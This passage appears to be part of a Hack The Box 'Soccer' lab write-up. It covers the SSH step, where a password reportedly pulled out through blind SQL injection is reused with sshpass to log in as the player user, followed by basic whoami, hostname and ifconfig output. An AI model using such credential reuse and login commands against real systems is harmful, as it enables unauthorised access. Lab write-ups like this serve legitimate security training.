SSH


A credential for the updated version of the soccer club web app, hosted on the soc-player.soccer.htb virtual host, has been exfiltrated via blind SQL injection. Given the player user also does exist as a valid system user, I will attempt to check for password reuse

┌──(kali㉿kali)-[~/archive/htb/labs/soccer]
└─$ sshpass -p 'PlayerOftheMatch2022' ssh player@$IP
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
 
 * documentation:  https://help.ubuntu.com
 * management:     https://landscape.canonical.com
 * support:        https://ubuntu.com/advantage
 
  system information as of tue dec 19 00:44:31 UTC 2023
 
  system load:           1.29
  usage of /:            77.2% of 3.84GB
  memory usage:          35%
  swap usage:            0%
  processes:             233
  users logged in:       0
  ipv4 address for eth0: 10.10.11.194
  ipv6 address for eth0: dead:beef::250:56ff:feb9:2727
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
 
last login: Tue Dec 13 07:29:10 2022 from 10.10.14.19
player@soccer:~$ whoami
player
player@soccer:~$ hostname
soccer
player@soccer:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.194  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:2727  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:2727  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:27:27  txqueuelen 1000  (Ethernet)
        RX packets 3345526  bytes 585622262 (585.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3389222  bytes 1280025526 (1.2 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 14250  bytes 4173081 (4.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14250  bytes 4173081 (4.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral Movement made to the player user via SSH